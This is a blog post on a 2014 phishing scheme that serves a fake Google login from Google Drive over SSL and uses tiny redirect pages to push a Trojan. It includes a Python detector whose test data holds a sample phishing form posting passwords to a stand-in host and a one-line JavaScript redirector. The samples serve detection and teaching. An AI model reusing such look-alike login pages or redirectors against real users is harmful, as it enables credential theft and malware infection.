Thursday, 26 June 2014

Google Drive used to compromise user accounts

I received an email yesterday that was a very clever piece of illegal scamming.
When I looked further into how the scam works I got a surprise. Google Docs and Google Drive are the focus of a very sophisticated phishing scam. It is more effective than the usual phishing messages we see every day because the fake Google login page is actually served over SSL from the legitimate Google Drive service itself.

Most phishing advice focuses on visually inspecting the address bar: check that the connection is HTTPS and that the domain is the one you expect. That is good advice, but it does not help against this specific attack, because here the fake page really is hosted on Google's own domain and really is served over SSL.

This phishing scam starts like many others: with an email. The malicious message reportedly arrives with the subject line "Documents" and points to a Google Docs link. The link shows a Google domain in the address bar and takes you to a fake login page that looks just like the real Google login page. This is how the attackers get you.

"The fake page is actually hosted on Google's servers and is served over SSL, making the page even more convincing," Symantec security expert Nick Johnston explained in a blog post. "The scammers have simply created a folder inside a Google Drive account, marked it as public, uploaded a file there, and then used Google Drive's preview feature to get a publicly accessible URL to include in their messages."
Screenshot: the page where the phishing email leads.

The email I received came from a legitimate customer who uses Google Drive. When I clicked on the link I was brought to the page above. Once you log in through the fake page, you are even taken to an actual Google Doc. Your credentials are sent to a PHP script on a compromised server, and you may never know they have been swiped.

Not just phishing, but malware too

According to Symantec, static HTML pages on Google Drive are also being used to redirect to malware. In these cases a very small HTML file (under 100 bytes) uses JavaScript to redirect victims to a shortened URL (served over SSL, perhaps to give a false sense of security). The shortened URL finally redirects to a compromised Brazilian website hosting a Trojan.
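Both abuse patterns described above, the look-alike sign-in page that posts credentials to a PHP script elsewhere and the tiny HTML file that only redirects, can be picked out mechanically once the linked page has been fetched. The script below is an added example written for this post, not code from Symantec or Google. It uses only the Python standard library; the document URLs, the file and folder ids, the "compromised.example" and "short.example" hosts and the three sample pages are all constructed for the example. It also includes the naive "lock and domain" check most users are taught, to show that both the phishing page and a genuine document pass it.

```python
"""Triage of pages reached from email links, built around the two Drive abuse
patterns described above: a look-alike sign-in form served from Google Drive
that posts the password elsewhere, and a tiny HTML file whose only job is to
redirect. Standard library only; every URL and page below is constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Hosts that serve user-uploaded content. A genuine Google sign-in form is never
# served from these; it lives on accounts.google.com.
DOCUMENT_HOSTS = {"docs.google.com", "drive.google.com"}
TINY_PAGE_BYTES = 200   # the redirector pages Symantec described were under 100 bytes

# location = "...", location.href = "...", location.replace("..."), location.assign("...")
_LOCATION_RE = re.compile(
    r"""location(?:\.href)?\s*(?:=|\.replace\(|\.assign\()\s*['"]([^'"]+)['"]""")
_META_REFRESH_RE = re.compile(r"url\s*=\s*['\"]?([^'\"\s]+)", re.I)


def looks_like_google_over_tls(url: str) -> bool:
    """The 'check the lock and the domain' test most users are taught. It is
    exactly the test this phish is built to pass."""
    u = urlparse(url)
    host = u.hostname or ""
    return u.scheme == "https" and (host == "google.com" or host.endswith(".google.com"))


class _PageCollector(HTMLParser):
    """Collects forms (action + whether they contain a password field),
    inline <script> bodies and <meta http-equiv="refresh"> targets."""

    def __init__(self):
        super().__init__()
        self.forms, self.scripts, self.meta_refresh = [], [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "password": False})
        elif tag == "input" and (a.get("type") or "").lower() == "password" and self.forms:
            self.forms[-1]["password"] = True
        elif tag == "script":
            self._in_script = True
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = _META_REFRESH_RE.search(a.get("content") or "")
            if m:
                self.meta_refresh.append(m.group(1))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def redirect_targets(html: str) -> list:
    """URLs the page sends the browser to without any click."""
    p = _PageCollector()
    p.feed(html)
    targets = list(p.meta_refresh)
    for body in p.scripts:
        targets.extend(_LOCATION_RE.findall(body))
    return targets


def analyze_page(page_url: str, html: str) -> list:
    """Return human-readable findings for a fetched page; [] means nothing matched."""
    page_host = urlparse(page_url).hostname or ""
    p = _PageCollector()
    p.feed(html)
    findings = []
    for form in p.forms:
        if not form["password"]:
            continue
        # A relative or empty action resolves to the page's own host.
        action_host = urlparse(urljoin(page_url, form["action"])).hostname or page_host
        if page_host in DOCUMENT_HOSTS:
            findings.append(f"password form served from document host {page_host}")
        if action_host != page_host:
            findings.append(f"credentials posted off-origin to {action_host}")
    size = len(html.encode())
    if size < TINY_PAGE_BYTES:
        for target in redirect_targets(html):
            findings.append(f"tiny page ({size} bytes) redirects to {target}")
    return findings


# Constructed sample 1: a look-alike sign-in page uploaded to Drive (placeholder file id).
PHISH_URL = "https://docs.google.com/file/d/EXAMPLE_FILE_ID/preview"
PHISH_HTML = """<html><body><h1>Google Docs</h1>
<form method="post" action="http://compromised.example/php/login.php">
<input name="Email"><input type="password" name="Passwd">
<button>Sign in</button></form></body></html>"""

# Constructed sample 2: a tiny redirector of the kind used to push the Trojan.
REDIRECT_URL = "https://drive.google.com/host/EXAMPLE_FOLDER_ID/go.html"
REDIRECT_HTML = '<script>location="https://short.example/x1"</script>'

# Constructed sample 3: an ordinary shared document, nothing to flag.
BENIGN_URL = "https://docs.google.com/document/d/EXAMPLE_DOC_ID/edit"
BENIGN_HTML = "<html><body><p>Quarterly report</p></body></html>"

if __name__ == "__main__":
    for url, html in ((PHISH_URL, PHISH_HTML), (REDIRECT_URL, REDIRECT_HTML), (BENIGN_URL, BENIGN_HTML)):
        print(url, "passes naive check:", looks_like_google_over_tls(url))
        for finding in analyze_page(url, html):
            print("  !", finding)
```

The two useful signals are the ones the address bar cannot show you: a password field on a page served from a document-hosting domain, and a form action (or a scripted redirect) pointing at a host other than the one in the address bar. Run against fetched content at a mail gateway or proxy, these heuristics catch the phish even though `looks_like_google_over_tls` returns True for it.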

Symantec have advised users to enable Google's two-factor authentication and to keep security software up to date on endpoints and gateways.

Symantec say they have contacted Google to seek advice and were given the following response:

"We've removed the fake pages and our abuse team is working to prevent this kind of spoofing from happening again. If you think you may have accidentally given out your account information, please reset your password."

That was last March; I got the rogue email yesterday.